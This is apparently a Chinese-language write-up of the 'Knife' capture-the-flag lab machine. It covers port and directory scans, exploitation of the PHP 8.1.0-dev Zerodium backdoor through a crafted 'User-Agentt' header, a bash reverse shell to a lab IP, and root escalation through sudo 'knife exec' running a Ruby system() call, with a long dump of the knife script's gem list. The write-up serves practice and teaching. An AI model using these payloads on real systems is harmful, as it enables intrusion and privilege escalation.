Easy L-Knife
信息搜集
初识
访问ip
上面的选项都点不了
扫端口
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjEtN3+WZzlvu54zya9Q+D0d/jwjZT2jYFKwHe0icY7plEWSAqbP+b3ijRL6kv522KEJPHkfXuRwzt5z4CNpyUnqr6nQINn8DU0Iu/UQby+6OiQIleNUCYYaI+1mV0sm4kgmue4oVI1Q3JYOH41efTbGDFHiGSTY1lH3HcAvOFh75dCID0564T078p7ZEIoKRt1l7Yz+GeMZ870Nw13ao0QLPmq2HnpQS34K45zU0lmxIHqiK/IpFJOLfugiQF52Qt6+gX3FOjPgxk8rk81DEwicTrlir2gJiizAOchNPZjbDCnG2UqTapOm292Xg0hCE6H03Ri6GtYs5xVFw/KfGSGb7OJT1jhitbpUxRbyvP+pFy4/8u6Ty91s98bXrCyaEy2lyZh5hm7MN2yRsX+UbrSo98UfMbHkKnePg7/oBhGOOrUb77/DPePGeBF5AT029Xbz90v2iEFfPdcWj8SP/p2Fsn/qdutNQ7cRnNvBVXbNm0CpiNfoHBCBDJ1LR8p8k=
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
| 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
扫目录
16:44:13] Starting:
[16:44:25] 403 - 277B - /.ht_wsr.txt
[16:44:28] 403 - 277B - /.htaccess_extra
[16:44:28] 403 - 277B - /.htaccessOLD
[16:44:28] 403 - 277B - /.htaccess.orig
[16:44:28] 403 - 277B - /.htaccessOLD2
[16:44:28] 403 - 277B - /.htaccess.sample
[16:44:28] 403 - 277B - /.htaccess.save
[16:44:28] 403 - 277B - /.htaccessBAK
[16:44:28] 403 - 277B - /.htaccess_orig
[16:44:28] 403 - 277B - /.htm
[16:44:28] 403 - 277B - /.htaccess_sc
[16:44:28] 403 - 277B - /.html
[16:44:28] 403 - 277B - /.htaccess.bak1
[16:44:28] 403 - 277B - /.htpasswd_test
[16:44:28] 403 - 277B - /.htpasswds
[16:44:28] 403 - 277B - /.httr-oauth
[16:46:22] 403 - 277B - /server-status
[16:46:22] 403 - 277B - /server-status/ 目录也没东西
打波poc
还真扫出来了
直接梭进去
入侵
PHP 8.1.0-dev Zerodium Backdoor
PHP 版本 8.1.0-dev 于 2021 年 3 月 28 日发布了带有后门的版本,但该后门很快被发现并删除。如果此版本的 PHP 在服务器上运行,攻击者可以通过发送 User-Agentt 标头来执行任意代码。
User-Agentt: zerodiumsystem("whoami");
直接反弹shell
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.18/1234 0>&1'");
驻足
窃取ssh私钥(失败)
窃取 ~/.ssh/id_rsa,但是要求密码原语
上线msf
那直接上线msf叭
python起个伪终端
python3 -c "import pty;pty.spawn('/bin/bash')"提权
linpeas
sudo -l 可用无密码 sudo 执行 /usr/bin/knife
是一个超链接指向/opt/chef-workstation/bin/knife,打开是一个ruby脚本
#!/opt/chef-workstation/embedded/bin/ruby --disable-gems
#--APP_BUNDLER_BINSTUB_FORMAT_VERSION=1--
require "rubygems"
begin
# this works around rubygems/rubygems#2196 and can be removed in rubygems > 2.7.6
require "rubygems/bundler_version_finder"
rescue LoadError
# probably means rubygems is too old or too new to have this class, and we don't care
end
# avoid appbundling if we are definitely running within a Bundler bundle.
# most likely the check for defined?(Bundler) is enough since we don't require
# bundler above, but just for paranoia's sake also we test to see if Bundler is
# really doing its thing or not.
unless defined?(Bundler) && Bundler.instance_variable_defined?("@load")
ENV["GEM_HOME"] = ENV["GEM_PATH"] = nil unless ENV["APPBUNDLER_ALLOW_RVM"] == "true"
::Gem.clear_paths
gem "activesupport", "= 5.2.4.5"
gem "addressable", "= 2.7.0"
gem "appbundler", "= 0.13.2"
gem "artifactory", "= 3.0.15"
gem "ast", "= 2.4.2"
gem "aws-eventstream", "= 1.1.0"
gem "aws-partitions", "= 1.427.0"
gem "aws-sdk-apigateway", "= 1.59.0"
gem "aws-sdk-apigatewayv2", "= 1.31.0"
gem "aws-sdk-applicationautoscaling", "= 1.49.0"
gem "aws-sdk-athena", "= 1.35.0"
gem "aws-sdk-autoscaling", "= 1.53.0"
gem "aws-sdk-batch", "= 1.43.0"
gem "aws-sdk-budgets", "= 1.37.0"
gem "aws-sdk-cloudformation", "= 1.47.0"
gem "aws-sdk-cloudfront", "= 1.48.0"
gem "aws-sdk-cloudhsm", "= 1.28.0"
gem "aws-sdk-cloudhsmv2", "= 1.32.0"
gem "aws-sdk-cloudtrail", "= 1.33.0"
gem "aws-sdk-cloudwatch", "= 1.49.0"
gem "aws-sdk-cloudwatchevents", "= 1.40.0"
gem "aws-sdk-cloudwatchlogs", "= 1.39.0"
gem "aws-sdk-codecommit", "= 1.41.0"
gem "aws-sdk-codedeploy", "= 1.38.0"
gem "aws-sdk-codepipeline", "= 1.41.0"
gem "aws-sdk-cognitoidentity", "= 1.29.0"
gem "aws-sdk-cognitoidentityprovider", "= 1.48.0"
gem "aws-sdk-configservice", "= 1.57.0"
gem "aws-sdk-core", "= 3.112.0"
gem "aws-sdk-costandusagereportservice", "= 1.29.0"
gem "aws-sdk-databasemigrationservice", "= 1.50.0"
gem "aws-sdk-dynamodb", "= 1.59.0"
gem "aws-sdk-ec2", "= 1.224.0"
gem "aws-sdk-ecr", "= 1.41.0"
gem "aws-sdk-ecs", "= 1.74.0"
gem "aws-sdk-efs", "= 1.37.0"
gem "aws-sdk-eks", "= 1.48.0"
gem "aws-sdk-elasticache", "= 1.53.0"
gem "aws-sdk-elasticbeanstalk", "= 1.41.0"
gem "aws-sdk-elasticloadbalancing", "= 1.30.0"
gem "aws-sdk-elasticloadbalancingv2", "= 1.60.0"
gem "aws-sdk-elasticsearchservice", "= 1.48.0"
gem "aws-sdk-firehose", "= 1.36.0"
gem "aws-sdk-glue", "= 1.82.0"
gem "aws-sdk-guardduty", "= 1.44.0"
gem "aws-sdk-iam", "= 1.48.0"
gem "aws-sdk-kafka", "= 1.34.0"
gem "aws-sdk-kinesis", "= 1.31.0"
gem "aws-sdk-kms", "= 1.42.0"
gem "aws-sdk-lambda", "= 1.59.0"
gem "aws-sdk-organizations", "= 1.55.0"
gem "aws-sdk-ram", "= 1.22.0"
gem "aws-sdk-rds", "= 1.114.0"
gem "aws-sdk-redshift", "= 1.54.0"
gem "aws-sdk-route53", "= 1.46.0"
gem "aws-sdk-route53domains", "= 1.29.0"
gem "aws-sdk-route53resolver", "= 1.23.0"
gem "aws-sdk-s3", "= 1.88.1"
gem "aws-sdk-secretsmanager", "= 1.43.0"
gem "aws-sdk-securityhub", "= 1.40.0"
gem "aws-sdk-servicecatalog", "= 1.57.0"
gem "aws-sdk-ses", "= 1.37.0"
gem "aws-sdk-shield", "= 1.34.0"
gem "aws-sdk-sms", "= 1.28.0"
gem "aws-sdk-sns", "= 1.38.0"
gem "aws-sdk-sqs", "= 1.36.0"
gem "aws-sdk-ssm", "= 1.104.0"
gem "aws-sdk-states", "= 1.37.0"
gem "aws-sdk-transfer", "= 1.29.0"
gem "aws-sigv4", "= 1.2.2"
gem "axiom-types", "= 0.1.1"
gem "azure_graph_rbac", "= 0.17.2"
gem "azure_mgmt_compute", "= 0.21.1"
gem "azure_mgmt_key_vault", "= 0.17.7"
gem "azure_mgmt_network", "= 0.26.0"
gem "azure_mgmt_resources", "= 0.18.1"
gem "azure_mgmt_security", "= 0.19.0"
gem "azure_mgmt_storage", "= 0.22.0"
gem "bcrypt_pbkdf", "= 1.1.0.rc2"
gem "bcrypt_pbkdf", "= 1.1.0.rc2"
gem "bcrypt_pbkdf", "= 1.1.0.rc2"
gem "berkshelf", "= 7.2.0"
gem "binding_of_caller", "= 1.0.0"
gem "builder", "= 3.2.4"
gem "byebug", "= 11.1.3"
gem "chef", "= 16.10.8"
gem "chef", "= 16.10.8"
gem "chef-apply", "= 0.5.3"
gem "chef-bin", "= 16.10.8"
gem "chef-cli", "= 3.1.1"
gem "chef-config", "= 16.10.8"
gem "chef-telemetry", "= 1.0.14"
gem "chef-utils", "= 16.10.8"
gem "chef-vault", "= 4.1.0"
gem "chef-zero", "= 15.0.4"
gem "chef_deprecations", "= 0.1.2"
gem "cheffish", "= 16.0.12"
gem "chefspec", "= 9.2.1"
gem "chefstyle", "= 1.7.1"
gem "citrus", "= 3.0.2"
gem "cleanroom", "= 1.0.0"
gem "coderay", "= 1.1.3"
gem "coercible", "= 1.0.0"
gem "concurrent-ruby", "= 1.1.8"
gem "cookbook-omnifetch", "= 0.11.1"
gem "cookstyle", "= 7.8.0"
gem "debug_inspector", "= 1.0.0"
gem "declarative", "= 0.0.20"
gem "declarative-option", "= 0.1.0"
gem "dep-selector-libgecode", "= 1.3.5"
gem "dep_selector", "= 1.0.6"
gem "descendants_tracker", "= 0.0.4"
gem "diff-lcs", "= 1.3"
gem "docker-api", "= 2.0.0"
gem "domain_name", "= 0.5.20190701"
gem "droplet_kit", "= 3.13.0"
gem "ed25519", "= 1.2.4"
gem "equalizer", "= 0.0.11"
gem "erubi", "= 1.10.0"
gem "erubis", "= 2.7.0"
gem "excon", "= 0.79.0"
gem "faraday", "= 1.3.0"
gem "faraday-cookie_jar", "= 0.0.7"
gem "faraday-net_http", "= 1.0.1"
gem "faraday_middleware", "= 1.0.0"
gem "fauxhai-ng", "= 8.7.0"
gem "ffi", "= 1.14.2"
gem "ffi", "= 1.14.2"
gem "ffi", "= 1.14.2"
gem "ffi-libarchive", "= 1.0.17"
gem "ffi-yajl", "= 2.3.4"
gem "filesize", "= 0.2.0"
gem "fog-core", "= 2.2.3"
gem "fog-json", "= 1.2.0"
gem "fog-openstack", "= 1.0.11"
gem "formatador", "= 0.2.5"
gem "fuzzyurl", "= 0.9.0"
gem "gcewinpass", "= 1.1.0"
gem "google-api-client", "= 0.42.2"
gem "googleauth", "= 0.14.0"
gem "gssapi", "= 1.3.1"
gem "guard", "= 2.16.2"
gem "gyoku", "= 1.3.1"
gem "hashie", "= 4.1.0"
gem "highline", "= 2.0.3"
gem "http-cookie", "= 1.0.3"
gem "httpclient", "= 2.8.3"
gem "i18n", "= 1.8.9"
gem "ice_nine", "= 0.11.2"
gem "inifile", "= 3.0.0"
gem "iniparse", "= 1.5.0"
gem "inspec", "= 4.26.4"
gem "inspec-bin", "= 4.26.4"
gem "inspec-core", "= 4.26.4"
gem "ipaddress", "= 0.8.3"
gem "jmespath", "= 1.4.0"
gem "json", "= 2.5.1"
gem "jwt", "= 2.2.2"
gem "kartograph", "= 0.2.8"
gem "kitchen-azurerm", "= 1.5.0"
gem "kitchen-digitalocean", "= 0.11.2"
gem "kitchen-dokken", "= 2.11.2"
gem "kitchen-ec2", "= 3.8.0"
gem "kitchen-google", "= 2.2.0"
gem "kitchen-hyperv", "= 0.5.5"
gem "kitchen-inspec", "= 2.3.0"
gem "kitchen-openstack", "= 5.0.1"
gem "kitchen-vagrant", "= 1.8.0"
gem "kitchen-vcenter", "= 2.9.8"
gem "knife-azure", "= 3.0.6"
gem "knife-cloud", "= 4.0.15"
gem "knife-ec2", "= 2.1.3"
gem "knife-google", "= 5.0.8"
gem "knife-opc", "= 0.4.7"
gem "knife-tidy", "= 2.1.2"
gem "knife-vcenter", "= 5.0.5"
gem "knife-vsphere", "= 4.1.7"
gem "knife-windows", "= 4.0.6"
gem "kramdown", "= 2.3.0"
gem "kramdown-parser-gfm", "= 1.1.0"
gem "libyajl2", "= 1.2.0"
gem "license-acceptance", "= 2.1.13"
gem "listen", "= 3.4.1"
gem "little-plugger", "= 1.1.4"
gem "lockfile", "= 2.1.3"
gem "logging", "= 2.3.0"
gem "lumberjack", "= 1.2.8"
gem "mdl", "= 0.11.0"
gem "memoist", "= 0.16.2"
gem "method_source", "= 1.0.0"
gem "mime-types", "= 3.3.1"
gem "mime-types-data", "= 3.2021.0212"
gem "mini_mime", "= 1.0.2"
gem "mini_portile2", "= 2.4.0"
gem "minitar", "= 0.9"
gem "minitest", "= 5.13.0"
gem "mixlib-archive", "= 1.1.4"
gem "mixlib-archive", "= 1.1.4"
gem "mixlib-authentication", "= 3.0.7"
gem "mixlib-cli", "= 2.1.8"
gem "mixlib-config", "= 3.0.9"
gem "mixlib-install", "= 3.12.5"
gem "mixlib-log", "= 3.0.9"
gem "mixlib-shellout", "= 3.2.5"
gem "mixlib-shellout", "= 3.2.5"
gem "mixlib-versioning", "= 1.2.12"
gem "molinillo", "= 0.7.0"
gem "ms_rest", "= 0.7.6"
gem "ms_rest_azure", "= 0.12.0"
gem "multi_json", "= 1.15.0"
gem "multipart-post", "= 2.1.1"
gem "nenv", "= 0.3.0"
gem "net-ping", "= 2.0.8"
gem "net-scp", "= 3.0.0"
gem "net-sftp", "= 3.0.0"
gem "net-ssh", "= 6.1.0"
gem "net-ssh-gateway", "= 2.0.0"
gem "net-ssh-multi", "= 1.2.1"
gem "netaddr", "= 1.5.1"
gem "nokogiri", "= 1.10.10"
gem "nokogiri", "= 1.10.10"
gem "nokogiri", "= 1.10.10"
gem "nori", "= 2.6.0"
gem "notiffany", "= 0.1.3"
gem "octokit", "= 4.20.0"
gem "ohai", "= 16.10.6"
gem "optimist", "= 3.0.1"
gem "os", "= 1.1.1"
gem "parallel", "= 1.20.1"
gem "parser", "= 3.0.0.0"
gem "parslet", "= 1.8.2"
gem "pastel", "= 0.8.0"
gem "plist", "= 3.6.0"
gem "proxifier", "= 1.0.3"
gem "pry", "= 0.13.1"
gem "pry-byebug", "= 3.9.0"
gem "pry-remote", "= 0.1.8"
gem "pry-stack_explorer", "= 0.6.1"
gem "public_suffix", "= 4.0.6"
gem "r18n-core", "= 4.0.0"
gem "r18n-desktop", "= 4.0.0"
gem "rack", "= 2.2.3"
gem "rainbow", "= 3.0.0"
gem "rake", "= 13.0.1"
gem "rb-fsevent", "= 0.10.4"
gem "rb-inotify", "= 0.10.1"
gem "rb-readline", "= 0.5.5"
gem "rbvmomi", "= 3.0.0"
gem "regexp_parser", "= 2.0.3"
gem "representable", "= 3.0.4"
gem "resource_kit", "= 0.1.7"
gem "retriable", "= 3.1.2"
gem "retryable", "= 3.0.5"
gem "rexml", "= 3.2.4"
gem "rspec", "= 3.10.0"
gem "rspec-core", "= 3.10.1"
gem "rspec-expectations", "= 3.10.1"
gem "rspec-its", "= 1.3.0"
gem "rspec-mocks", "= 3.10.2"
gem "rspec-support", "= 3.10.2"
gem "rubocop", "= 1.10.0"
gem "rubocop-ast", "= 1.4.1"
gem "ruby-progressbar", "= 1.11.0"
gem "ruby-shadow", "= 2.5.0"
gem "ruby2_keywords", "= 0.0.4"
gem "rubyntlm", "= 0.6.3"
gem "rubyzip", "= 2.3.0"
gem "sawyer", "= 0.8.2"
gem "semverse", "= 3.0.0"
gem "shellany", "= 0.0.1"
gem "signet", "= 0.14.1"
gem "slop", "= 3.6.0"
gem "solve", "= 4.0.4"
gem "sshkey", "= 2.0.0"
gem "sslshake", "= 1.3.1"
gem "strings", "= 0.2.0"
gem "strings-ansi", "= 0.2.0"
gem "syslog-logger", "= 1.6.8"
gem "test-kitchen", "= 2.10.0"
gem "thor", "= 1.1.0"
gem "thread_safe", "= 0.3.6"
gem "timeliness", "= 0.3.10"
gem "toml-rb", "= 2.0.1"
gem "tomlrb", "= 1.3.0"
gem "train", "= 3.4.9"
gem "train-aws", "= 0.1.35"
gem "train-core", "= 3.4.9"
gem "train-habitat", "= 0.2.22"
gem "train-winrm", "= 0.2.12"
gem "tty-box", "= 0.7.0"
gem "tty-color", "= 0.6.0"
gem "tty-cursor", "= 0.7.1"
gem "tty-prompt", "= 0.23.0"
gem "tty-reader", "= 0.9.0"
gem "tty-screen", "= 0.8.1"
gem "tty-spinner", "= 0.9.3"
gem "tty-table", "= 0.12.0"
gem "tzinfo", "= 1.2.9"
gem "uber", "= 0.1.0"
gem "unf", "= 0.1.4"
gem "unf_ext", "= 0.0.7.7"
gem "unf_ext", "= 0.0.7.7"
gem "unf_ext", "= 0.0.7.7"
gem "unicode-display_width", "= 1.7.0"
gem "unicode_utils", "= 1.4.0"
gem "uuidtools", "= 2.2.0"
gem "virtus", "= 1.0.5"
gem "vsphere-automation-appliance", "= 0.4.7"
gem "vsphere-automation-cis", "= 0.4.7"
gem "vsphere-automation-content", "= 0.4.7"
gem "vsphere-automation-runtime", "= 0.4.7"
gem "vsphere-automation-sdk", "= 0.4.7"
gem "vsphere-automation-vapi", "= 0.4.7"
gem "vsphere-automation-vcenter", "= 0.4.7"
gem "webrick", "= 1.7.0"
gem "winrm", "= 2.3.6"
gem "winrm-elevated", "= 1.2.3"
gem "winrm-fs", "= 1.3.5"
gem "wisper", "= 2.0.1"
gem "wmi-lite", "= 1.0.5"
gem "yard", "= 0.9.26"
gem "chef", "= 16.10.8"
gem "bundler" # force activation of bundler to avoid unresolved specs if there are multiple bundler versions
spec = Gem::Specification.find_by_name("chef", "= 16.10.8")
else
spec = Gem::Specification.find_by_name("chef")
end
unless Gem::Specification.unresolved_deps.empty?
$stderr.puts "APPBUNDLER WARNING: unresolved deps are CRITICAL performance bug, this MUST be fixed"
Gem::Specification.reset
end
bin_file = spec.bin_file("knife")
Kernel.load(bin_file)
chef-knife
Knife 是 Chef 的命令行工具,用于与 Chef 服务器进行交互。一个人用它来上传Cookbook和管理 Chef 的其他方面。它提供了本地机器上的 ChefDK(Repo)和 Chef 服务器之间的接口。它有助于管理
试运行一下
sudo /usr/bin/knife
ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND)
Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message. 研究
什么是Chef
Chef有三个重要的概念:(如上图所示)
它们的合作关系大致是这样的, Workstation把资源或者说是一些要被运行的命令上传到Chef-Server上, Nodes自动通过Chef-Server拿到属于自己的执行任务到本地执行,这样可达到一个将军指挥千军万马的效果:smirk:。
- Chef Server
存放所有通过Workstation上传的资源,和用户等公共数据(用PostgreSQL)。 可以干脆叫它为资源服务器,大家都可以与它通讯(用RabbitMQ ), 本身提供一个在线管理工具叫chef-server-webui(用Nginx,包括它的rest-api)。
Chef Server只能安装在linux系统上。 - Workstation
简单理解为管理员操作机,通过安装的工具knife远程操作Chef-Server上的资源,或者注册Nodes等
这个可以安装在任意系统上,包括windows - Nodes
一些客户端的机子,它们是内部装有一个工具叫做Chef-Client,这东西会自动到Chef-Server上获取自己的要执行命令清单
可以安装在任意系统上,包括windows
什么是Knife
Knife 是 Chef 的命令行工具,用于与 Chef 服务器交互。人们使用它来上传Cookbook(食谱)和管理 Chef 的其他方面。
发现攻击点:Knife exec
knife需要子命令才能运行 Chef - Knife 设置 | Chef 教程
我从中发现了一个有意思的子命令 knife exec
问问GPT:
knife exec是 Chef 的knife工具中的一个子命令,允许你通过执行 Ruby 代码来与 Chef Infra Server 进行交互。这个命令可以用于执行任意的 Ruby 脚本,操作 Chef 资源,或者自动化某些任务。
🤔那我创建一个恶意.rb文件的话…poc如下:
#!/usr/bin/env ruby
require 'chef/api_client'
require 'chef/node'
bash_command = 'whaomi'
puts "Executing bash command: #{bash_command}"
system(bash_command)
把命令改为bash -p即可实现提权
总结
这个机器还是很简单的,粗浅了解了一下 chef 以及 ruby 语言